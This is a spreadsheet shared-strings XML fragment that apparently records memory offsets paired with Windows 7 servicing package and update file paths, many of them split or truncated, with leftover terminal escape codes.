  <si>
    <t>0xde8b2200</t>
  </si>
  <si>
    <t>4e35~x86~es-E</t>
  </si>
  <si>
    <t>0xde8b2530</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2647753_SP1~31bf3856ad364e35~x86~~6.1.4.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b25e8</t>
  </si>
  <si>
    <t>4e35~x86~et-E</t>
  </si>
  <si>
    <t>E~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b2918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB3124275~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b29d0</t>
  </si>
  <si>
    <t>4e35~x86~nl-N</t>
  </si>
  <si>
    <t>0xde8b2db8</t>
  </si>
  <si>
    <t>4e35~x86~tr-T</t>
  </si>
  <si>
    <t>0xde8b34f8</t>
  </si>
  <si>
    <t>4e35~x86~hu-H</t>
  </si>
  <si>
    <t>U~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b3db8</t>
  </si>
  <si>
    <t>4e35~x86~de-D</t>
  </si>
  <si>
    <t>0xde8b4038</t>
  </si>
  <si>
    <t>4e35~x86~he-I</t>
  </si>
  <si>
    <t>0xde8b4428</t>
  </si>
  <si>
    <t>4e35~x86~zh-H</t>
  </si>
  <si>
    <t>0xde8b4700</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2639308_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b4ae8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2639308_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b4d80</t>
  </si>
  <si>
    <t>0xde8b4f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2900986~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b5038</t>
  </si>
  <si>
    <t>4e35~x86~lv-L</t>
  </si>
  <si>
    <t>V~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b5480</t>
  </si>
  <si>
    <t>4e35~x86~ko-K</t>
  </si>
  <si>
    <t>_x001B_[0K_x001B_[144G</t>
  </si>
  <si>
    <t>0xde8b57b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_168_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b5868</t>
  </si>
  <si>
    <t>4e35~x86~hi-I</t>
  </si>
  <si>
    <t>N~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b5b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2900986_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b5c50</t>
  </si>
  <si>
    <t>4e35~x86~ja-J</t>
  </si>
  <si>
    <t>P~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b6038</t>
  </si>
  <si>
    <t>4e35~x86~lt-L</t>
  </si>
  <si>
    <t>T~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b62d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-LocalPack-GB-Package~31bf3856ad364e35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde8b6390</t>
  </si>
  <si>
    <t>4e35~x86~zh-C</t>
  </si>
  <si>
    <t>0xde8b6788</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_197_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b6840</t>
  </si>
  <si>
    <t>4e35~x86~sr-L</t>
  </si>
  <si>
    <t>ATN-CS~7.1.</t>
  </si>
  <si>
    <t>7601.1</t>
  </si>
  <si>
    <t>6492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b6a38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2515325~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b6af0</t>
  </si>
  <si>
    <t>86~sl-SI~7.</t>
  </si>
  <si>
    <t>0xde8b7388</t>
  </si>
  <si>
    <t>4e35~x86~uk-U</t>
  </si>
  <si>
    <t>A~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b7790</t>
  </si>
  <si>
    <t>4e35~x86~da-D</t>
  </si>
  <si>
    <t>0xde8b7ae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e</t>
  </si>
  <si>
    <t>35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde8b7b98</t>
  </si>
  <si>
    <t>4e35~x86~sl-S</t>
  </si>
  <si>
    <t>0xde8b7f80</t>
  </si>
  <si>
    <t>4e35~x86~pt-P</t>
  </si>
  <si>
    <t>0xde8b8298</t>
  </si>
  <si>
    <t>4e35~x86~ru-R</t>
  </si>
  <si>
    <t>0xde8b8558</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685813_RTM~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b8610</t>
  </si>
  <si>
    <t>86~da-DK~7.</t>
  </si>
  <si>
    <t>0xde8b8ac0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_437_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8b8b78</t>
  </si>
  <si>
    <t>4e35~x86~sv-S</t>
  </si>
  <si>
    <t>0xde8b8ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~x86~~6.1</t>
  </si>
  <si>
    <t>0xde8b8f80</t>
  </si>
  <si>
    <t>4e35~x86~hr-H</t>
  </si>
  <si>
    <t>0xde8b9180</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e</t>
  </si>
  <si>
    <t>35~x86~~8.0.7</t>
  </si>
  <si>
    <t>0xde8b9238</t>
  </si>
  <si>
    <t>4e35~x86~cs-C</t>
  </si>
  <si>
    <t>Z~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8b9640</t>
  </si>
  <si>
    <t>4e35~x86~ar-S</t>
  </si>
  <si>
    <t>0xde8b9a48</t>
  </si>
  <si>
    <t>4e35~x86~it-I</t>
  </si>
  <si>
    <t>0xde8b9d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-InternetExplorer-Package~31bf3856ad364e35~x86~~8</t>
  </si>
  <si>
    <t>.0.7600.16385</t>
  </si>
  <si>
    <t>0xde8b9e50</t>
  </si>
  <si>
    <t>4e35~x86~zh-T</t>
  </si>
  <si>
    <t>W~7.1.7601.</t>
  </si>
  <si>
    <t>0xde8ba148</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~t</t>
  </si>
  <si>
    <t>h-TH~7.1.7601</t>
  </si>
  <si>
    <t>.16492.mum_x001B_</t>
  </si>
  <si>
    <t>0xde8ba618</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~f</t>
  </si>
  <si>
    <t>r-FR~7.1.7601</t>
  </si>
  <si>
    <t>0xde8ba8c8</t>
  </si>
  <si>
    <t>86~uk-UA~7.</t>
  </si>
  <si>
    <t>0xde8bad78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_278_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8bae30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~~</t>
  </si>
  <si>
    <t>7.1.7601.1649</t>
  </si>
  <si>
    <t>2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8bb1a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~n</t>
  </si>
  <si>
    <t>b-NO~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bb590</t>
  </si>
  <si>
    <t>i-FI~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bb868</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2882822_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8bbb98</t>
  </si>
  <si>
    <t>0xde8bbc50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2882822~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8bc038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Indexing-Service-Package~31bf3856ad364e35~x86~~6</t>
  </si>
  <si>
    <t>0xde8bc1a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~p</t>
  </si>
  <si>
    <t>l-PL~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bc4f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Indexing-Service-Package~31bf3856ad364e35~x86~en</t>
  </si>
  <si>
    <t>0xde8bc5a8</t>
  </si>
  <si>
    <t>t-BR~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bc9b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~s</t>
  </si>
  <si>
    <t>k-SK~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bcdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~b</t>
  </si>
  <si>
    <t>g-BG~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bd4b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~e</t>
  </si>
  <si>
    <t>n-GB~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bd808</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-LocalPack-CA-Package~31bf3856ad364e35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde8bd8c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~r</t>
  </si>
  <si>
    <t>o-RO~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bdb80</t>
  </si>
  <si>
    <t>0xde8bdc38</t>
  </si>
  <si>
    <t>86~hr-HR~7.</t>
  </si>
  <si>
    <t>0xde8be388</t>
  </si>
  <si>
    <t>l-NL~7.1.7601</t>
  </si>
  <si>
    <t>0xde8be790</t>
  </si>
  <si>
    <t>r-TR~7.1.7601</t>
  </si>
  <si>
    <t>0xde8beae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2647753_RTM~31bf3856ad364e35~x86~~6.1.4.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8beb98</t>
  </si>
  <si>
    <t>l-GR~7.1.7601</t>
  </si>
  <si>
    <t>0xde8beec8</t>
  </si>
  <si>
    <t>0xde8bef80</t>
  </si>
  <si>
    <t>n-US~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bf2a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~h</t>
  </si>
  <si>
    <t>u-HU~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bf5f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Sidebar-Killbits-SDP-Package~31bf3856ad364e35~x8</t>
  </si>
  <si>
    <t>6~~6.1.7600.1</t>
  </si>
  <si>
    <t>0xde8bf6a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~d</t>
  </si>
  <si>
    <t>e-DE~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bfb78</t>
  </si>
  <si>
    <t>s-ES~7.1.7601</t>
  </si>
  <si>
    <t>0xde8bfec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685813~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8bff80</t>
  </si>
  <si>
    <t>t-EE~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c0238</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~j</t>
  </si>
  <si>
    <t>a-JP~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c0640</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~l</t>
  </si>
  <si>
    <t>v-LV~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c0990</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PeerDist-Client-Package~31bf3856ad364e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde8c0a48</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~z</t>
  </si>
  <si>
    <t>h-HK~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c0e50</t>
  </si>
  <si>
    <t>e-IL~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c11b0</t>
  </si>
  <si>
    <t>r-LATN-CS~7.1</t>
  </si>
  <si>
    <t>0xde8c15b8</t>
  </si>
  <si>
    <t>t-LT~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c19b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-LocalPack-AU-Package~31bf3856ad364e35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde8c1a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~k</t>
  </si>
  <si>
    <t>o-KR~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c1d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PeerDist-Client-Package~31bf3856ad364e35~x86~en-</t>
  </si>
  <si>
    <t>0xde8c1e50</t>
  </si>
  <si>
    <t>i-IN~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c2038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_25_for_KB2966583~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c20f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_55_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c2240</t>
  </si>
  <si>
    <t>t-PT~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c2450</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IE-Troubleshooters-Package~31bf3856ad364e35~x86~</t>
  </si>
  <si>
    <t>0xde8c2780</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Core-UIComp~31bf3856ad364e35~x86~~7.6.7600.256</t>
  </si>
  <si>
    <t>0xde8c2838</t>
  </si>
  <si>
    <t>0xde8c2d98</t>
  </si>
  <si>
    <t>0xde8c2e50</t>
  </si>
  <si>
    <t>h-CN~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c3218</t>
  </si>
  <si>
    <t>r-HR~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c3568</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~x86~~6.1.760</t>
  </si>
  <si>
    <t>0xde8c3620</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~u</t>
  </si>
  <si>
    <t>k-UA~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c3a28</t>
  </si>
  <si>
    <t>a-DK~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c3e30</t>
  </si>
  <si>
    <t>l-SI~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c4038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB2758857~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c40f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_151_for_KB2726535~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c4468</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Printing-XPSServices-Package~31bf3856ad364e35~x8</t>
  </si>
  <si>
    <t>0xde8c4520</t>
  </si>
  <si>
    <t>h-TW~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c4908</t>
  </si>
  <si>
    <t>u-RU~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c4c38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_73_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c4cf0</t>
  </si>
  <si>
    <t>v-SE~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c5038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~i</t>
  </si>
  <si>
    <t>t-IT~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c5388</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WLMS-Package~31bf3856ad364e35~x86~~6.1.7600.1638</t>
  </si>
  <si>
    <t>0xde8c5440</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_294_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c5790</t>
  </si>
  <si>
    <t>0xde8c5848</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~c</t>
  </si>
  <si>
    <t>s-CZ~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c5c50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-UIAnimation-WinIP-Package~31bf3856ad364e35~x86~a</t>
  </si>
  <si>
    <t>r-SA~7.1.7601</t>
  </si>
  <si>
    <t>0xde8c5f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2647753~31bf3856ad364e35~x86~~6.1.4.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c6038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_421_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c6358</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~~7.</t>
  </si>
  <si>
    <t>1.7601.16492.</t>
  </si>
  <si>
    <t>0xde8c6760</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_503_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K_x001B_[1</t>
  </si>
  <si>
    <t>27G</t>
  </si>
  <si>
    <t>0xde8c6ab0</t>
  </si>
  <si>
    <t>0xde8c6b68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_365_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c7288</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TerminalServices-UsbRedirector-Package~31bf3856a</t>
  </si>
  <si>
    <t>01.175</t>
  </si>
  <si>
    <t>0xde8c7340</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~th-</t>
  </si>
  <si>
    <t>TH~7.1.7601.1</t>
  </si>
  <si>
    <t>6492.mum_x001B_[0</t>
  </si>
  <si>
    <t>0xde8c7748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~fr-</t>
  </si>
  <si>
    <t>FR~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8c7a78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WLMS-Package~31bf3856ad364e35~x86~en-US~6.1.7600</t>
  </si>
  <si>
    <t>0xde8c7b30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3156016_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c7e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde8c7f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3156016~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c8240</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~nb-</t>
  </si>
  <si>
    <t>NO~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8c8480</t>
  </si>
  <si>
    <t>0xde8c8868</t>
  </si>
  <si>
    <t>0xde8c8b98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3122648~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c8e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB971468~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c8f18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~fi-</t>
  </si>
  <si>
    <t>FI~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8c92c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~pl-</t>
  </si>
  <si>
    <t>PL~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8c9578</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rshx32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8c96c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~pt-</t>
  </si>
  <si>
    <t>BR~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8c9a18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TerminalServices-Publishing-WMIProvider-Package~</t>
  </si>
  <si>
    <t>e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde8c9ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~sk-</t>
  </si>
  <si>
    <t>SK~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8c9eb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~bg-</t>
  </si>
  <si>
    <t>BG~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8ca100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2985461~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ca1d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~el-</t>
  </si>
  <si>
    <t>GR~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8ca6a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~en-</t>
  </si>
  <si>
    <t>US~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8ca9f8</t>
  </si>
  <si>
    <t>e35~x86~en-</t>
  </si>
  <si>
    <t>US~6.1</t>
  </si>
  <si>
    <t>.7600.16385.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8caab0</t>
  </si>
  <si>
    <t>GB~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8caeb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~ro-</t>
  </si>
  <si>
    <t>RO~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cb1a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~es-</t>
  </si>
  <si>
    <t>ES~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cb5a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~et-</t>
  </si>
  <si>
    <t>EE~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cb8f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB971468_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8cb9b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~nl-</t>
  </si>
  <si>
    <t>NL~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cbd00</t>
  </si>
  <si>
    <t>.7601.17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8cbdb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~tr-</t>
  </si>
  <si>
    <t>TR~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cc038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2937610~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8cc100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2894844~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8cc588</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~he-</t>
  </si>
  <si>
    <t>IL~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cc990</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~hu-</t>
  </si>
  <si>
    <t>HU~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8ccce0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TerminalServices-RemoteApplications-Client-Packa</t>
  </si>
  <si>
    <t>ge~31bf3856ad</t>
  </si>
  <si>
    <t>364e35~x86~</t>
  </si>
  <si>
    <t>~6.1.7</t>
  </si>
  <si>
    <t>600.16385.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ccd98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~de-</t>
  </si>
  <si>
    <t>DE~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cd2d0</t>
  </si>
  <si>
    <t>en-US~</t>
  </si>
  <si>
    <t>6.1.7601.17514.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8cd388</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~hi-</t>
  </si>
  <si>
    <t>IN~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cd790</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~ja-</t>
  </si>
  <si>
    <t>JP~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cdb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~x86~lv-</t>
  </si>
  <si>
    <t>LV~7.1.7601.1</t>
  </si>
  <si>
    <t>0xde8cdec8</t>
  </si>
  <si>
    <t>6.1.7600.16385.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8cdf80</t>
  </si>
  <si>
